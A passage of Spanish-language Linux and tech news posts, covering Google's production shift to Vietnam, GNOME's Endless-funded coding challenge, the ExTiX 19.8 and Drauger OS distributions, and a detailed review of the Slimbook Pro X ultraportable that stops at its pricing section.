Con esta situación Google quiere evitar a toda costa ser otra victima más y prefirió buscar el traslado de la producción de sus productos incluidos los teléfonos Pixel y su popular altavoz inteligente, Google Home, según las fuentes.

Google parece estar rezagado en este impulso. HP y Dell también reubicaron la producción de sus servidores fuera de China para evitar las tarifas punitivas impuestas por Washington, mientras transferían parte de la producción de computadoras portátiles a Taiwán y otros países asiáticos del sureste como Vietnam, Tailandia y Filipinas.

En cuanto a Apple, la compañía también planea separarse de China, pero esto es muy difícil de lograr ya que más del 90% de sus equipos se fabrican en el país.

De momento se sabe que Google transferirá parte de la producción del teléfono Pixel 3A a Vietnam antes de finales de este año.

Es probable que parte de la producción de altavoces inteligentes se transfiera a Tailandia, pero el desarrollo de nuevos productos y la producción inicial de la gama de hardware de la compañía seguirá en China.

Este movimiento por parte de Google deja preocupados a muchos pues dejan pensando en la posibilidad de que la compañía con este traslado a Vietnam conduzca a una disminución en el control de calidad sobre los productos a fin de abaratar más los costos.

Al diversificar su producción en Vietnam, Google espera garantizar una producción sostenible de la gama Pixel.

Además de que se espera que la agresiva campaña de hardware de Google ejerza presión sobre los fabricantes de dispositivos móviles de segundo nivel como LG Electronics y Sony, que están luchando a medida que la industria enfrenta su tercer año consecutivo de declive.

Este no es el primer movimiento de Google fuera de China. Parece que la compañía estaba trabajando para mover Nest y la producción de hardware de servidor para dispositivos con sede en EE. UU. A Taiwán y Malasia a principios de este año, también para evitar aumentos de precios debido a la guerra comercial entre EE. UU y China.


https://www.linuxadictos.com/google-cambia-la-sede-de-produccion-de-sus-productos-a-la-antigua-fabrica-de-nokia.html

 

Endless dona 500 mil dólares al Coding Education Challenge de GNOME




Recientemente la fundación GNOME anunció el “Coding Education Challenge”, un evento de tres etapas para ofrecer a los estudiantes y profesores la oportunidad de compartir ideas y proyectos innovadores para enseñar a programar usando software de código abierto.

Para el financiamiento (y el premio a los ganadores), Endless ha donado 500 mil dólares para darle un empujón a la competencia y hacerla más atractiva a los estudiantes y profesores alrededor del mundo. Medio millón de dólares es una cifra realmente atractiva para los equipos (o personas) que queden en los primeros lugares.

(adsbygoogle = window.adsbygoogle || []).push({});

Endless es una compañía muy presente en la comunidad tecnológica a nivel mundial. Su principal meta es ayudar a que los niños tengan acceso digital y puedan aprovecharlo. Entre otros proyectos cuentan con la distribución Endless OS y mini computadoras con Linux que comercian para ayudar a sus proyectos educativos.

En un comunicado de prensa, Neil McGovern, director ejecutivo de la fundación GNOME mencionó estar contento de que Endless se haya unido:

Estamos emocionados por ver lo que podemos lograr cuando apoyamos la imaginación y creatividad de nuestra comunidad global. Esperamos lograr una unión fuerte para que nuestros estudiantes y profesores exploren las posibilidades de un ecosistema de software vasto y diverso. Llegar a las nuevas generaciones es vital para asegurar el futuro del software libre en los próximos años.

Hasta $100,000 para los ganadores


Adicionalmente, al anuncio y donación, del cual no hay mucha información, se sabe que cualquiera – equipo o individuo – puede enviar su propuesta para ser parte de la competencia.

(adsbygoogle = window.adsbygoogle || []).push({});

Se ha decidido que en la primera etapa habrá 20 ganadores que recibirán $6,500 dólares por cada una de sus ideas.

Para la segunda etapa, los ganadores tendrán que crear un prototipo funcional de su idea y solo cinco elegidos pasarán a tercera ronda, cada uno recibirá un premio de $25,000.

En la etapa final se creará el producto prototipado en su versión completa y solo habrá dos vencedores finales. Los 3 finalistas recibirán $25,000 dólares, mientras que los 2 vencedores se quedarán con $100,000 cada uno. Si quieres conocer todos los detalles de esta competencia puedes entrar a este enlace.

https://www.linuxadictos.com/endless-dona-500-mil-dolares-al-coding-education-challenge-de-gnome.html

 

ExTiX 19.8 se pasa a Deepin, abandonando a Debian/Ubuntu




Técnicamente, ExTiX 19.8 sigue basándose en Debian/Ubuntu, pero ahora pasa a hacerlo de una manera indirecta. La nueva versión se llama ahora ExTiX Deepin 19.8 y pasa a basarse en Deepin 15.11, quien a su vez está basado y usa los repositorios “unstable” de Debian. Que a nadie le extrañe que ExTiX use un repositorio inestable, puesto que suele ir por delante del software en el que se basa y en ocasiones lanza sistemas operativos “estables” basados en sistemas operativos que aún están en fase beta. Si hay un adjetivo que le queda como un guante a Arne Exton, creo que ese adjetivo es “osado”.

Pero en esta ocasión no ha hecho como en lanzamientos pasados: Deepin 15.11 se lanzó en el mes de julio y llegó con mejoras interesantes como una que a mí me llamó especialmente la atención: una nueva función llamada Cloud Sync que podríamos usar para sincronizar las preferencias del sistema operativo, por lo que no tendríamos que empezar de cero tras realizar una instalación de cero. En otras ocasiones, Exton sí ha ido por delante, como fue el caso de un ExTiX 19.3 que en marzo ya estaba basado en Ubuntu 19.04 (salía en abril) y el kernel Linux 5.2.

(adsbygoogle = window.adsbygoogle || []).push({});

ExTiX 19.8 usa el kernel Linux 5.3-rc6


En donde sí vuelve a ir por delante de un lanzamiento oficial es en el núcleo de su sistema operativo: ExTiX 19.8 usa Linux 5.3, un kernel que cuya versión más actualizada es la sexta Release Candidate del mismo. Personalmente, esto nunca me ha gustado, puesto que de esta manera es más probable que experimentemos fallos que si se esperara al lanzamiento de la versión estable que, claro está, la etiqueta “estable” tiene su significado.

Entre las novedades más destacadas de ExTiX 19.8 tenemos:
  • Posibilidad de elegir idioma antes de iniciar el sistema.
  • El nuevo instalador gráfico por defecto es Deepin Installer Reborn.
  • Soporte para ver Netflix en Google Chrome.
  • Clientes de Spotify y Skype instalados por defecto.
  • Posibilidad de ejecutar ExTiX directamente desde la RAM, con lo que podemos eliminar la unidad bootable.
  • Se ha incluido Refracta Snapshot.
Tenéis toda la información sobre este lanzamiento en su página web oficial y ExTiX 19.8 se puede descargar desde aquí.

(adsbygoogle = window.adsbygoogle || []).push({});

https://www.linuxadictos.com/extix-19-8-se-pasa-a-deepin-abandonando-a-debian-ubuntu.html

 

Drauger OS: nueva distro gaming que pretende ofrecer una experiencia de usuario de consola en Linux


Entre los gamers, o yo lo veo así porque no lo soy, hay dos “equipos”: el que prefiere jugar en ordenadores y el que prefiere jugar en consolas. Lo poco que juego yo prefiero hacerlo en consolas, pero sé que hay muchos que prefieren hacerlo en PCs. En los ordenadores, el sistema operativo que tiene más juegos disponibles es Windows, pero en los últimos años han llegado más y más juegos a Linux, en parte gracias a plataformas como Steam. Una mezcla de las dos experiencias es lo que pretende ser Drauger OS, una distribución relativamente nueva.

Tal y como explican en la página web del proyecto, Drauger OS es un sistema operativo de escritorio “gaming” que intenta ofrecer las experiencias de juegos combinadas de PC y consolas en una plataforma unificada al mismo tiempo que ofrece altas velocidades y baja latencia. El escritorio que usa es un Xfce configurado para que la interfaz se parezca a la de una consola, algo que consigue al mostrar una barra horizontal en el medio de la pantalla.

(adsbygoogle = window.adsbygoogle || []).push({});

Funciones que ofrece Drauger OS

  • Kernel de baja latencia.
  • Entorno gráfico Xfce.
  • Soporte para el controlador de la Xbox.
  • Wine, PlayOnLinux, Steam y Lutris instalados por defecto (hay que ejecutar Steam una vez para que termine de instalarse).
  • DXVK.
  • Basado en Xubuntu LTS (la última versión, Drauger 7.4.1 está basada en Xubuntu 18.04).
  • En estos momentos solo está disponible en inglés, chino e hindi, aunque se pueden descargar más idiomas.
Su desarrollador, Thomas Castleman, dice que creó Drauger OS para llenar el vacío que había en muchas opciones importantes en las distribuciones de videojuegos que habían sido abandonadas. Uno de los objetivos de Castleman fue reclutar a otros que estuvieran dispuestos a ayudar en su desarrollo. Otros objetivos incluyen hacer que la distribución sea intuitiva con una funcionalidad confiable. Hacer crecer una comunidad vibrante ayudará a que Drauger OS prospere. Así será más fácil para los usuarios obtener soporte.

Qué es y qué no es


Drauger OS es un sistema operativo basado en Linux. Lo que lo diferencia de la mayoría es lo que tiene instalado por defecto, que facilita mucho encontrar, instalar y disfrutar los videojuegos con un gran rendimiento. Dicho de otro modo y rendimiento e interfaz aparte, lo que nos ofrece esta distribución es lo mismo que obtendríamos si instalamos todo lo necesario en cualquier otra distribución Linux.

Lo que no es es una distribución para uso diario. Esta es una de las razones por las que su equipo de desarrolladores no ha incluido aplicaciones básicas que no son necesarias para jugar, como software de edición de vídeo y audio o una suite de ofimática. Sí incluye aplicaciones como:
  • Configuración.
  • Gestor de archivos.
  • Clementine.
  • Gestor de archivadores Engranpa.
  • Terminal.
  • Calculadora.
  • Firefox.
  • Editor de textos.
  • Reproductor de vídeo.
  • Centro de software, desde donde podremos instalar otros paquetes como VLC o GIMP.

El futuro de Drauger OS


Lo que esperan conseguir/hacer en un futuro es:

(adsbygoogle = window.adsbygoogle || []).push({});
  • Seguir adelante. Sus desarrolladores están constantemente buscando gente que quiera colaborar con el desarrollo. De esta manera, si alguien decide abandonar el proyecto, otro puede ocupar su lugar.
  • Que sea fácil de usar. Uno de los objetivos de Drauger OS es que sea fácil de usar, intuitivo, pero también que tanto software como hardware “funcionen”.
  • Que la comunidad crezca.
  • Que sea fácil contactar para recibir soporte o para contribuir en su desarrollo. Para ello, en la actualidad tienen abierto un grupo de Telegram, un Servidor de Discord, se les puede enviar emails o incluso contactarles por Twitter y Mastodon.
Con todo lo explicado aquí, el “target” de Drauger OS son usuarios que quieran jugar en Linux, con sus puntos fuertes y flacos, y busquen la mejor experiencia de usuario posible, tanto en rendimiento como en interfaz de usuario. En mi opinión, la mejor manera de usar esta distribución es en dualboot, lo que nos permitiría usar un ordenador con todas sus funciones cuando lo necesitemos o movernos por una distribución con mejor rendimiento para los videojuegos cuando queramos divertirnos un rato.

Más información y descarga aquí.
Bild/Foto
Artículo relacionado:
Steam propone cambios en el kernel de Linux para mejorar el rendimiento de los videojuegos

https://www.linuxadictos.com/drauger-os-nueva-distro-gaming-que-pretende-ofrecer-una-experiencia-de-usuario-de-consola-en-linux.html

 

Slimbook Pro X: impresionante por dentro y por fuera




Hace casi tres meses desde que me agencié con una unidad del flamante Slimbook Pro X, el nuevo modelo de ultraportátil de la marca valenciana que tanto revuelo causó cuando fue anunciado. Casi tres meses es mucho tiempo, sí; pero me gusta tomarme las cosas con calma. No suelo ‘analizar’ muchos equipos para MuyLinux y cuando lo hago prefiero que sea a conciencia. Al fin y al cabo, o así lo entiendo yo, a cualquier dispositivo que ronda los mil euros se le supone calidad, y para análisis técnicos de los componentes hay otras páginas que ya lo han hecho mucho mejor de lo que podría hacerlo yo.

Los que os traigo aquí son mis impresiones pormenorizadas del equipo tras casi tres meses en los que lo he usado de manera intensiva, como si de mi propio equipo se tratase. Así pues, estoy listo para dar sobrada opinión acerca del Slimbook Pro X y no quiero haceros perder el tiempo: si entrabais para ir directos a las conclusiones, os las sirvo en el mismo titular. Si queréis saber más, seguid leyendo, porque hay mucho que contar.

Recapitulando lo justo, Slimbook anunciaba el 7 de junio la renovación de la serie PRO y adelantaba «lo nunca visto (en Linux, se entiende)», un nuevo equipo del que fueron desgranando detalles a modo de cuentagotas hasta que desvelaron el todo, que aquí os trasladamos como el ultraportátil definitivo de la marca española. Y no me desdigo: al menos de momento, Slimbook Pro X es lo mejor que ha lanzado la compañía. Además, por rimbombante que suene, tampoco mentían con lo de «lo nunca visto»: es un dispositivo muy particular, único en su especie.

Como apunté en la presentación del Slimbook Pro X, se daba un salto importante hacia adelante con este lanzamiento, ya que no estamos solo ante un ordenador más de esta marca, sino ante el primer conato de «experiencia Slimbook» como producto más allá del hardware. Y el objetivo es ambicioso. Sin embargo, vamos a empezar hablando del equipo como ente independiente, porque la «experiencia Slimbook» aún no está al alcance de todo el mundo.

Un apunte: el texto es largo e incluye multitud de detalles, pero no una tabla de especificaciones para revisar rápidamente. Para eso está la ficha técnica oficial, que es la que os recomiendo para contrastar cualquier dato.

Slimbook Pro X por fuera


Permitidme que comience con una pequeña anécdota que describe muy bien uno de los puntos fuertes del Slimbook Pro X: su condición de ultraportátil.


Para llevar sin pesar

Cuando llegué a las oficinas de Slimbook para ver el Pro X, le estaban instalando el sistema para que lo probase. Mientras esperaba estuve charlando con Alejandro López, director comercial de Slimbook, y aproveché para mirar y toquetear el resto de sus equipos, que tienen expuestos en la sala de entrada. Ahí estaban todos: el Apollo y el Curve, dos All in One realmente espectaculares; los Kymera Ventus y Aqua, sendas naves espaciales en formato torre que llaman la atención a metros; o el Slimbook One, una delicia pequeña, compacta y potente.

No os engaño si os digo que soy más de sobremesa que de portátiles, pero venía a ver un portátil, y antes de hacerlo repasé también las 15 pulgadas del Eclipse, las 14 del ahora PRO BASE y las 13 de un viejo conocido: el equipo que sorteamos en el décimo aniversario de MuyLinux y del que publicamos un análisis en profundidad: KATANA II. Es calcado al KDE Slimbook excepto, obviamente, por el logo de la tapa (me encantó ver el KDE Slimbook in situ, la verdad).

Total, que ahí estaba yo, toqueteando los 13 pulgadas de Slimbook, equipos ligeros donde los haya, cuando me trajeron el Pro X. Fue cogerlo y… La impresión es que me habían dado una carcasa vacía. Pero no. Aun así, acostumbrado como estaba a un portátil de casi el mismo tamaño y el doble de peso, la sensación de estar llevándome una caja vacía me acompañó hasta casa. Este es el primer aspecto que me gustaría destacar del equipo, pese a que ya me he acostumbrado (¡a lo bueno siempre se acostumbra uno rápido!).


Ligereza ante todo

Slimbook PRO X es un auténtico ultraportátil


Ultraportátil significa ultracompacto y ultraligero, y tales adjetivos casan a la perfección con las series PRO y KATANA de Slimbook. Pero el Pro X los supera a todos, e incluso se atreve a competir con los mejores fuera del catálogo de Slimbook. Veamos una comparación rápida de dimensiones y peso del Slimbook Pro X con dos de las referencias del segmento ultraportátil:

MacBook Air
  • 30,41 cm de ancho
  • 21,24 cm de fondo
  • 1,56 cm de grosor
  • 1,25 kg de peso
Dell XPS 13
  • 30,2 cm de ancho
  • 19,9 cm de fondo
  • 1,16 cm de grosor
  • 1,23 kg de peso
Slimbook PRO X
  • 32 cm de ancho
  • 21 cm de fondo
  • 1,68 cm de grosor
  • 1,1 kg de peso
Como se puede apreciar, el Slimbook Pro X no es el más pequeño o el más fino, pero es el más ligero. En cualquier caso, los tres están muy parejos en dimensiones y peso y la comparación no tendría interés salvo por dos datos muy significativos: el primero es que Slimbook no es Apple o Dell. Que una pyme valenciana pueda ofrecer un producto así es digno de mención, tiene mucho mérito.



El segundo y más importante para quien se haya fijado en este equipo, es que a diferencia del MacBook Air o el Dell XPS 13, el Slimbook Pro X integra una pantalla de 14 pulgadas en una carcasa de 13. ¿Cómo lo han hecho?

Construcción


Antes de pasar a la pantalla, pieza clave del entramado, regocijémonos un poco con la estética y construcción del Slimbook Pro X. Porque si lo primero que sientes al tener el equipo en las manos es su peso pluma, lo segundo es que no estás tocando plástico o aluminio al uso.

El Slimbook Pro X está construido con una aleación de magnesio y aluminio que aporta ligereza y resistencia, al tiempo que transmite una sensación al tacto agradable, más cálida que el aluminio. Pese a lo ligero, la construcción se nota sólida y en cuanto a estética, es tan sobrio como cabía esperar. Hace años, cuando los fabricantes de componentes como las caja solo servían plástico, la diferencia con los modelos premium de las grandes marcas era manifiesta; ahora no es así y la presencia que desprenden es impoluta.


Sobrio y elegante

El Slimbook Pro X está -o más bien estará- en dos estilos: claro y oscuro. La versión que ha salido a la venta es la plateada típica. A partir de septiembre tendrán disponible una versión en negro. Yo he visto ambas y en mi opinión, son muy elegantes las dos.

Pantalla


Enlazando construcción y pantalla, el secreto del Slimbook Pro X para ofrecer una pantalla de 14 pulgadas en una carcasa de 13 es un delgadísimo bisel de 4.2 mm gracias al cual se logra un ratio de pantalla del 86%, con apenas una estrecha franja superior donde se sitúan las cámaras. En otras palabras, los bordes son ínfimos y la pantalla aprovecha el espacio al máximo. Y sí, poder disfrutar de -siendo escrupulosamente exactos con las medidas- una pantalla de 14,4 pulgadas en una carcasa de un 12,8 pulgadas es simplemente genial.

La pantalla es excelente: IPS LED FHD, esto es, aspect ratio 16:9 y 1.920×1.080 píxeles de resolución. No tiene sentido más, y es que condensar más resolución en tan poco espacio físico sirve a lo sumo para ganar algo de definición escalando, a costa siempre de un mayor consumo. Esto se nota especialmente en los portátiles de 13 pulgadas: todo se ve diminuto; pero incluso con un panel de 14,4 pulgadas, he tenido que retocar -que no escalar- elementos de la interfaz del escritorio para que la experiencia fuese óptima.

Cabe señalar a este respecto que el Slimbook Pro X cuenta con dos tarjetas gráficas: una integrada de Intel y una dedicada de NVIDIA, y ambas soportan resolución 4K por la salida HDMI.


Gran aprovechamiento de la pantalla

Por lo demás, la pantalla del Pro X ofrece calidad de color sRGB 99%, brillo de 300 nits, ángulo de visión de 170º y tecnología antifugas para prevenir las fugas de luz de los paneles IPS. Es, como he indicado, excelente: nítida, de colores vivos y muy brillante. Bajo luz artificial se puede utilizar perfectamente con un nivel de brillo del 30-40% o menos y en exteriores depende, pero aguanta el tipo con el sol de verano de Valencia, que ya es aguantar (no el de las tres de la tarde en la playa, ¿eh?).

Terminando con la pantalla, calificarla de excelente supone que ofrece el estándar de calidad que uno espera en un equipo de este estilo. Lo único más que se le podría pedir es mayor resolución, asunto que ya he comentado y que no me parece acertado por lo deficiente de la experiencia y el sobreprecio que suele acompañar; o pantalla táctil, algo que tendría más interés si fuese un convertible, pero como no lo es y el soporte de los escritorios Linux tampoco va muy allá… Nada más que añadir.

Teclado y panel táctil


Vista la pantalla nos centramos en las interfaces básicas: teclado y panel táctil, touchpad, trackpad o como se le quiera llamar.

Comenzando por el teclado, el Slimbook Pro X presume una vez más de aprovechamiento del espacio disponible con una superficie de tecla un 16% más grande que los modelos PRO BASE, lo que en conjunto supone en una experiencia de uso más cómoda. El resto de características a destacar incluyen formato ultraplano con un ligero relieve para facilitar la retroiluminación y un diseño más moderno que no me terminó de gustar en un primer momento.

Me refiero al diseño del teclado y la tipografía utilizada. No sé cómo explicarlo bien, pero si la tipografía y las teclas más redondeadas del KATANA II (o mi propio portátil de 13 pulgadas) tienen reminiscencias de Mac, este las tendría de Android. ¿Se entiende? El teclado del Pro X es más plano, las teclas son totalmente cuadradas, la fuente muy a lo Roboto… Con todo, en una semana de uso mi impresión había cambiado y ahora ya no pienso en ello. Además, su tacto es suave, muy similar al que proporciona la cubierta, lo cual no sucede con otros modelos e infiere al Slimbook Pro X una presentación más consistente.

Cómo no, el teclado está disponible en español con su eñe; en inglés y en alemán.


Teclado y panel

En cuanto al panel táctil, para mí ha sido una grata sorpresa, porque tampoco soy muy fan y donde esté un buen ratón que se quite lo demás. Hablamos de un espacio que también amplía su base en comparación con modelos anteriores hasta los 11,6 x 7,2 cm y es bastante versátil. Lo que más me ha gustado es el rollo ese de «Infinite touchpad con botones ocultos para evitar cortes» y que incluye los tres botones típicos de un ratón, por lo que ofrece por defecto la misma funcionalidad.

La superficie del trackpad es totalmente lisa y dependiendo de si pulsas en la parte izquierda, el centro o la derecha activarás las diferentes zonas táctiles. Por supuesto, también tiene soporte multitáctil, bloqueo mientras se escribe y la posibilidad de configurar gestos, pero que desde el principio ofrezca los tres botoncitos de marras es muy de agradecer (quizás en Windows esto no importe, pero en Linux…).

Webcam y cámara biométrica


Siguiendo con el repaso del equipo de fuera adentro, como previa al último apartado conviene pararse aunque sea con brevedad en las dos cámaras que incluye el Slimbook Pro X: una webcam estándar de 720 HD con doble micrófono estéreo y una segunda cámara biométrica para autenticación mediante reconocimiento facial, parte intrínseca de la «experiencia Slimbook» a la que he hecho alusión más arriba. Es por ello que no me voy a extender más ahora, sino que lo haré cuando llegue al apartado específico sobre esta función.

Conectividad


Tras la construcción, la pantalla y el panel táctil, uno de los aspectos más interesantes del Slimbook Pro X por fuera es la conectividad disponible: de wifi Intel 3165N a 433Mbps o Intel 9560 AC a 1730 Mbps hasta Bluetooth 5.0, salida HDMI y conexión jack para salida de audio y entrada de micrófono.
Si la conexión jack sigue siendo una característica imprescindible para muchos usuarios, no lo es menos el puerto RJ45 para conexión Ethernet por cable que ya traía la serie Pro a la que pertenece este modelo, pero no por ejemplo el KATANA II, y se echa en falta cuando no está.


El Slimbook Pro X va bien servido de conexiones

Por último están los cuatro puertos USB: dos USB 3.1 Gen 1 Type A, un USB 3.1 Gen 1 Type C y otro USB 2.0 Type A. Más que suficiente, sí, pero ¿podría mejorarse? Yo creo que sí. Con el tiempo hay cosas que han dejado de importarme, como tener un lector de tarjetas SD, así que no se lo pediría ni siquiera en formato mini. Como tampoco le pediría otro tipo de puertos más comunes en la liga en la que juega el Slimbook Pro X, pero…

Si el equipo hubiese incluido una entrada Thunderbolt 3, sería redondo. No es una carencia dramática, pero de tenerlo hubiese ganado enteros.

Slimbook Pro X por dentro


No os va a sorprender lo que voy a decir ahora, pero si el Slimbook Pro X es impresionante por fuera, el interior no le va a la zaga. Si el exterior destaca por la calidad de su acabado, la mejora de componentes, las opciones de conexión y esa cámara biométrica, por dentro es más de lo mismo, en el buen sentido de la expresión: componentes tope de gama y, junto con su factura ultraportátil, el segundo elemento más distintivo del equipo: gráficos híbridos. Vayamos por partes.


Slimbook Pro X por dentro

Procesador y memoria


Como decía, si una de las señas tradicionales de Slimbook es el cuidado diseño de sus equipos, la otra es la potencia, y el Pro X no es la excepción en ninguna de las dos. Todo lo que vende la compañía se nutre de componentes potentes y en el caso del modelo que nos ocupa, el más puntero de la serie Pro, más si cabe.

El único procesador que monta el Slimbook Pro X es el Intel i7-8565U, una pequeña bestia de última generación con cuatro núcleos y ocho hilos que corre desde los 1,8 GHz a los 4,6 GHz con el Turbo Boost desbloqueado. Aun a pesar de Intel, esta CPU garantiza un rendimiento excelente y yo lo certifico: va como una bala, no en vano es el chip elegido por la mayoría de fabricantes de ultraportátiles de gama alta este año.

La configuración de la memoria ofrece más margen de personalización: arranca en un mínimo de 8 GB de RAM DDR4 no soldada a 2400 o 2666 Mhz (según el módulo) y permite ampliarla hasta los 16 o 32 GB, ya sea en el momento de la compra o más adelante. Nada que objetar como sí hice con el KATANA II. En los tiempos que corren y con equipos de esta categoría, 8 GB de RAM es el mínimo indispensable para que todo vaya como uno espera.

En resumen, el rendimiento del Slimbook Pro X en su configuración más modesta es lo contrario de modesto y no supone ninguna sorpresa, tratándose de Slimbook. En lo que se refiere a calentamiento y ruido, nada noticiable.

Gráficos


La sorpresa viene en el apartado gráfico, porque el Slimbook Pro X no lleva una tarjeta gráfica, sino dos: una Intel UHD 620 4K integrada y una NVIDIA Geforce MX250 2 GB GDDR5 «diseñada especialmente para ultrabooks y 3,5 veces más potente».

¿Era necesario? Es la pregunta que me hice antes de usar a fondo el equipo, porque una vez constatado que se trata de un dispositivo de calidad, los dos factores más relevantes de un ultraportátil son a priori la ligereza y la autonomía, e introducir una segunda gráfica debería tener como consecuencia una merma en ambas. Pero no la tiene. O sea, si usas la NVIDIA en lugar de la Intel, es una obviedad que consumo y autonomía aumentarán y disminuirán respectiva y proporcionalmente; pero en lo demás no se nota.

¿Sería el Slimbook Pro X más ligero y económico de prescindir de la NVIDIA? Es posible. Sin embargo, no es el caso. La explicación de Slimbook para haber optado por este combo es tan sencilla como ofrecer más potencia en su equipo más puntero, y esto sí se nota.

Para empezar, la Intel UHD 620 4K es una apuesta segura en Linux, como lo suelen ser todas las Intel: con el controlador libre funciona de perlas y si el propósito de uso principal no contempla jugar o realizar tareas gráficas intensas, es más que suficiente para todo. También para jugar a muchos títulos que no sean exigentes. De hecho, podría llevar solo está gráfica y la valoración del equipo no se resentiría.


Intel UHD 620 4K

Pero está la NVIDIA Geforce MX250 2 GB GDDR5 y esas «3,5 veces más de potencia» son notables en según qué situaciones. Al utilizar la NVIDIA la potencia es plena.


NVIDIA Geforce MX250 2 GB GDDR5

Ahora bien, ¿para qué da ese extra de potencia? No, el Slimbook Pro X no es un equipo para jugar, pero como no he tenido la oportunidad de someter a presión la capacidad gráfica en otros menesteres… Sí, he jugado. Y nada mal. Hay que tener en consideración que la ventaja de la NVIDIA para con la Intel no se reduce a ese «3,5» de más: la compatibilidad de NVIDIA en juegos es casi tanto o más importante. Sobre este aspecto concreto me gustaría publicar un artículo más detallado en otro momento, ya que no he podido probarlo con títulos actuales. Lo más exigente que tenía a mano es Hitman y no esperaba ni que arrancase, pero… ¡se puede jugar!

Como no podía ser de otra manera la NVIDIA necesita de controladores privativos y cuanto más reciente sea la versión mejor, aunque -por poner un ejemplo medianamente estándar- con los que lleva Ubuntu 18.04 LTS funciona bien. El único requisito es un kernel Linux 4.19 o superior, puesto que a pesar de no depender directamente del kernel, los controladores de NVIDIA se tienen que atener a los cambios en la interfaz binaria de aplicación (ABI) de este y de vez en cuando las versiones requeridas se actualizan. Lo cual significa que el Slimbook Pro X funcionará bien con distribuciones como Ubuntu 18.04.3 LTS e incluso Debian 10, aunque con esta última no lo he probado.

En cuanto al cambio entre una tarjeta y otra, sin las facilidades del sistema Optimus en Windows, las vías son: NVIDIA Settings; Slimbook Battery, una aplicación propia que forma parte de la mencionada «experiencia Slimbook» de la que hablaré más adelante; y el indicador de NVIDIA Prime, que Slimbook está preinstalando a petición de aquellos clientes que desean alternar entre gráficas sin modificar el perfil de energía. Un error en mi opinión (de quien lo pide; SLimbook ya hace bastante instalándolo). ¿Para qué, cuando con NVIDIA Settings son dos clics? En todo caso, el -como mínimo- reinicio de sesión es inevitable.


Con Slimbook Batter ycambias rápidamente de una tarjeta a otra

Almacenamiento


Pasando al almacenamiento, las posibilidades de configuración del Slimbook Pro X son también interesantes, admitiendo dos unidades SSD M.2 de hasta un máximo de 2 TB y velocidades de entre 500 MB/s y 3.000 MB/s a razón del modelo elegido. La primera puede ser una SSD de 250 GB, 500 GB o 1 TB, o una SSD NVMe -más potentes, pero más caras- de iguales capacidades. La segunda unidad es opcional y solo admite SSD NVMe de las capacidades señaladas, pero Slimbook permite que el cliente les envíe una SSD suya para montar, con un coste de 9 euros.

Otra opción cuando menos curiosa que se da en la página de configuración y compra del equipo es el montaje de las unidades en modo RAID 0 para exprimir la velocidad o en RAID 1 para mejorar la seguridad, con un coste adicional de 60 euros. ¿Cuál es la configuración recomendada? La que decida cada uno y la que se se ajuste al presupuesto, sobra añadir. Una de las quejas de los usuarios que han pasado de las SSD tradicionales a las NVMe es que apenas se percibe una mejora del rendimiento en el uso cotidiano, pero esto cambia con usos más específicos.

La configuración que he probado yo incluye una única SSD NVMe de 250 GB y aunque es verdad que para tareas normales no se aprecia diferencia, en otras más exigentes, como por ejemplo virtualizar sistemas, cambia la cosa (ojo que el sistema de archivos elegido también es relevante). Sobre los RAID, de contar con dos unidades no lo pensaría un segundo con un portátil de estas características: RAID 0, que ya me encargo yo de hacer mis copias de seguridad.

Autonomía


Cerramos bloque con uno de los aspectos más delicados de cualquier ordenador portátil: la autonomía, que es de 11 horas según los test MobileMark que usan los fabricantes para dar un dato que nunca se corresponde con la realidad. Tal vez por eso en Slimbook se apresuran a señalar que «en uso de oficina se reduce a aproximadamente entre 6 y 8 horas«. ¿Es así?

De nuevo, dependerá de muchos factores. No es lo mismo utilizar una distribución u otra, un escritorio u otro, una configuración de aplicaciones u otra… Y, por supuesto, no es lo mismo usar la Intel o la NVIDIA. Es de cajón: cuanta más presión le eches encima al equipo, menos va a durar la batería. En favor de Slimbook, no obstante, tengo que decir que la horquilla que indican se ajusta a la realidad.

Os cuento mi experiencia: el día a día con el Slimbook Pro X lo he pasado sobre todo con Kubuntu 19.04 gobernando el equipo. La configuración de software incluye KDE Connect, MEGASync, las cajas fuertes de Plasma, Latte Dock, Telegram, Firefox con una decena de extensiones y una media variable de entre 5 y 30 pestañas abiertas con música o podcast por streaming, lector RSS, gestor de correo electrónico y de tareas. Todo esto ejecutándose de manera constante. Como el Bluetooth. A lo que se le suman de manera casi constante otras aplicaciones como Kate, Atom, LibreOffice, GIMP o Gwenview y, ocasionalmente, Virtualbox. Este es mi «uso de oficina» habitual, con la Intel como compañera más asidua.

La autonomía que he observado se mueve en torno a las 6-7 horas con la Intel. Con la NVIDIA puede reducirse hasta en dos horas, aunque de nuevo depende de el tipo de actividad que realicemos frente al PC. De hecho, me he tenido que esforzar más de un día para agotar la batería del tirón, porque a ratos terminaba perdiendo la cuenta. Lo que sí he cavilado es que con una carga de trabajo más suave, un escritorio más sencillo y algún retoque, podría estirarlo en -estimo por algunas pruebas que he realizado sin profundizar mucho- una hora o más.

A todo esto, otro elemento destacado en este apartado es Slimbook Battery, que he mencionado antes hablando de los gráficos, pero que como indica su nombre tiene como principal atribución la de extender la duración de la batería. Slimbook preinstala Battery en todos sus portátiles y lo cierto es que es una aplicación de lo más interesante. Ofrece tres modos preconfigurados: «Máximo rendimiento», que también sirve para activar la NVIDIA; «Equilibrado», con la Intel a pleno funcionamiento; y «Ahorro de energía», con la Intel y una lista de restricciones en perfiles de ahorro.


Un vistazo a las opciones de Slimbook Battery

Slimbook Battery ofrece además una configuración avanzada con opciones para afinar a golpe de ratón cada uno de los modos; opciones que surgen de la utilidad TLP en la que se basa y a la que hace de interfaz visual. Es sin duda la mejor aportación al software libre que ha creado Slimbook por ahora. Espero que sigan desarrollándola y que faciliten su instalación en distribuciones más allá de Ubuntu.

Sin embargo, apenas lo he tocado. Salvo cuando lo he quitado para hacer comprobaciones o lo he usado para cambiar de gráfica, ha estado por norma en modo equilibrado y bastante satisfecho. Diría que me puede extender media hora la vida del portátil y podría ser más de no usar KDE Plasma, ya que este escritorio aplica unas políticas de ahorro energía por defecto estrictas y permite ajustarlas. Claro que en otro escritorio o en el propio KDE puedes instalar TLP. Esto me lleva a un pequeña reflexión y es, aun reconociendo la importancia de la autonomía en los dispositivos portátiles, lo poco que me afecta, porque adonde voy hay siempre un enchufe cerca.

He hablado de Kubuntu y KDE Plasma, pero por este Slimbook Pro X también ha pasado Ubuntu 19.04 -y algún que otro experimento rápido que no merece mención- y en lo que respecta a autonomía lo he visto muy similar. Slimbook Battery al margen, lo que me dijeron cuando recogí el equipo es que en sus pruebas GNOME parecía ser el escritorio que más exprimía la batería, pero no me ha dado tiempo a comprobarlo.

Precio y disponibilidad


